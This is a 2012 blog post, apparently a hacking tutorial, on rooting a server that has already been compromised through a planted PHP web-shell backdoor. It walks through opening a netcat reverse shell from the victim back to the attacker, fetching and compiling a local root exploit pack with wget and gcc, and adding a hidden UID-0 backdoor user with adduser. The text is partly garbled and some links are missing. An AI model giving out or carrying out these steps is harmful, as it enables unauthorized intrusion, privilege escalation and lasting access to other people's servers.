
Monday, April 2, 2012

Root Server and Add a New User

Ways to root server and adding a new root user, can later be used further.
It is needed is

  •      Computers & Coffee(hahaha...)
  •      Target sites that have been injected "shell backdoor"
  •      Exploit tools Localroot
  •      netcat
1 - Search Detail Information Server Target

Open the php shell on the previous website was hacked and had backdoors installed "php shell"

Will look like below:

Dude Click on the image to see full-Team Size Greetings ALBoRaaQ

The next step is to make sure you know the server kernel is used, usually have no information on the "shell backdoor" in the example above, namely:

Linux 2.6.18-8.el5 # 1 SMP Fri January 26 14:15:21 EST 2007 i686

Or you can use and run the command: uname-a

From the information above we know that the kernel is: 2.6.18-8 i686

Well, after knowing the information kernel, then steps should be done is to seek and find "LocalRoot Exploit" tool that is suitable for the above kernel. Provide localroot for this kernel: 2.6.18-8.el5 # 1 SMP Fri January 26 14:15:21 EST 2007 i686.

We're looking for here just localroot exploitnya, incidentally many listnya: localroot.th3-0utl4ws

download here

2 - BackConnecting From Server To Computer Attacker

As noted earlier, is needed in this case is:

  •      Netcat Tools (Must be installed on the computer)
  •      Open ports (ports that automatically opens)

Open netcat and run the following command, for example port to be used is 443:

C: \ WINDOWS \ system32 \ cmd.exe - nc-l-n-v-p 443

Then press the "Enter"

Later will come the message "Listening on [any] 443 ..."

After that, we return to the "shell backkdor" we have invested.
Find the function "Back Connect", then we have input the IP and port.

For example: We IP: and port: 443, as shown below:
Dude Click on the image to see full-Team Size Greetings ALBoRaaQ

We run the command "Connect"

If successful this will appear on-screen command line we are, that means back connect successfully with success.

3 - Download & Execution Exploit Exploit

We will need localroot exploit, can be downloaded from the link that was mentioned above, as for some ways you can do is
1) Using the function "wget / cURL"
2) Can be used to upload manually from the shell

Since the server is "wget" can be done, then download localroot exploit using the function "wget".
Okay, simply copy the download link "localroot exploit the right:

Download Tools Localroot collection of Th3-0utl4ws

download the local root
To download the tools above just type the command: wget

When it is downloaded then extract the "local root tools", it could by using the command "unzip" or "untar" or "tar"

As the example above, "localroot exploit already downloaded" and ter-extract:


The next step is the exploit localroot compile, because it uses the language "C", then used the GCC command:

gcc-o PRC prct1.c

Then run:

. / PRC

Note: If it fails and an error occurs, you should use the tools "local root" exploit others. (DO NOT GIVE UP!)

The above still fails, do it again and looking for another exploit!

Unzip the file again localroot exploit others: unzip

Well, localroot exploit above is very suitable for this kernel: ("2.6.18-164")

Since it was already compiled form file and was able to execute, it executed immediately & do not forget to change permissions so "777", as the following example:

chmod 777 2.6.18-164

Then run the exploit:


To check whether we've managed to get root access, check with the following command:


You've got root access, congrat!

4 - Adding a New Root User

Adding a level with the root user access is easy, simply use the following command, for example we will add the user root access "Haxorfortutorial":

adduser-u 0-o-g 0-G 0,1,2,3,4,6,10-M Haxorfortutorial

Explanation of commands:

adduser - linux basic commands to add user

-u 0-o - set user ID becomes a zero (0) root.

-g 0 - Set initial group with ID zero (0) root.

-G 0,1,2,3,4,6,10 - Set additional group to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel

-M - 'home directory' not create the user.

Haxorfortutorial - User name of the new user account.

Note: Change the user Haxorfortutorial in accordance with the username you want, these are just examples :)

Next, do set a password for the user that we created.

The command:
passwd Haxorfortutorial

Example of implementation:

[root @ fedora ~] # passwd Haxorfortutorial
Changing password for user Haxorfortutorial.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.

id Haxorfortutorial

GNY shell backdoor -
Tools Netcat -

Similarly, a short tutorial how ngeroot server easily, may always succeed ngeroot! completed

No comments:

Post a Comment